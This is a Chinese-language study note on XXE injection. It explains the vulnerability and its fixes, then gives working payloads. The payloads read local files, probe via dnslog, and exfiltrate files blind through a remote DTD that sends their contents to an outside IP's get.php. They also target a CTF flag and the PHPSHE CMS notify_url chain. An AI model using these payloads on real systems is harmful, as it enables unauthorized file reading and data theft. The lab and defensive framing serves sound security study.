总览

思路点：

XXE黑盒发现：
- 获取得到 Content-Type 或 数据类型为xml 时，尝试进行xml语言payload进行测试
- 不管获取的Content-Type类型或数据传输类型，均可尝试修改后提交测试xxe
- XXE不仅在数据传输上可能存在漏洞，同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行
XXE白盒发现：(前两点针对了大部分漏洞，但不能针对CSRF漏洞)
- 可通过 应用功能 追踪代码定位审计
- 可通过脚本 特定函数 搜索定位审计
- 可通过 伪协议玩法 绕过相关修复等

流程：
客户端xml发送数据
服务器xml解析数据

攻击方式：插入xml文件读取代码

白盒测试：查xml的操作函数和解析函数（比如PHP的）
靠运气查XML在代码当中的位置：查注释

详细点：

XML被设计为传输和存储数据，XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素，其焦点是数据的内容，其把数据从HTML分离，是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection，即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

XML 与 HTML 的主要差异：

XML 被设计为传输和存储数据，其焦点是数据的内容。
HTML 被设计用来显示数据，其焦点是数据的外观。
HTML 旨在显示信息，而 XML 旨在传输信息。

XXE修复防御方案：

方案1-禁用外部实体

#PHP:
libxml_disable_entity_loader(true);
#JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);
#Python：
from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案2-过滤用户提交的XML数据
- 过滤关键词：
<!DOCTYPE和<!ENTITY，或者SYSTEM和PUBLIC

实战

XML&XXE-黑盒-原理&探针&利用&玩法等

参考点我
 dtd语法

1、读取文件：
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM  "file:///d:/e.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>
1.1、带外测试：测试漏洞是否存在
<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % file SYSTEM "http://9v57ll.dnslog.cn">
    %file;
]>
<user><username>&send;</username><password>Mikasa</password></user>



2、外部引用实体dtd：（无/有 回显的外部实体）
 - 解决拦截防护问题
 - 解决数据不回显问题

使用
<?xml version="1.0" ?>
<!DOCTYPE test [
    // # 引用远程的dtd文件
    <!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
    %file;
]>
<user><username>&send;</username><password>Mikasa</password></user>

远程dtd文件内容：evil2.dtd => 读取D盘的e.txt
<!ENTITY send SYSTEM "file:///d:/e.txt">



3、无回显读文件
需要准备test.dtd和get.php
<?xml version="1.0"?>
// 读取文件并且读取远程dtd
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/e.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>

test.dtd
// 远程dtd再获得参数
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">



4、其他玩法（协议）-见参考地址

XML&XXE-前端-CTF&Jarvisoj&探针&利用

点我去靶场

XXE黑盒发现：

获取得到Content-Type或数据类型为xml时，尝试进行xml语言payload进行测试
不管获取的Content-Type类型或数据传输类型，均可尝试修改后提交测试xxe

流程：功能分析-前端提交-源码&抓包-构造Paylod测试

更改请求数据格式：Content-Type: application/xml
更改包内容
<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///home/ctf/flag.txt">
]>
<x>&f;</x>

XML&XXE-白盒-CMS&PHPSHE&无回显审计

审计流程：

漏洞函数simplexml_load_string
pe_getxml函数调用了漏洞函数
wechat_getxml调用了pe_getxml
notify_url调用了wechat_getxml

访问notify_url文件触发wechat_getxml函数,构造Paylod测试

先尝试读取文件，无回显后带外测试：
<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % file SYSTEM "http://1uwlwv.dnslog.cn">
    %file;
]>
<user><username>&send;</username><password>Mikasa</password></user>
然后带外传递数据解决无回显：
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/e.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>

test.dtd：
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">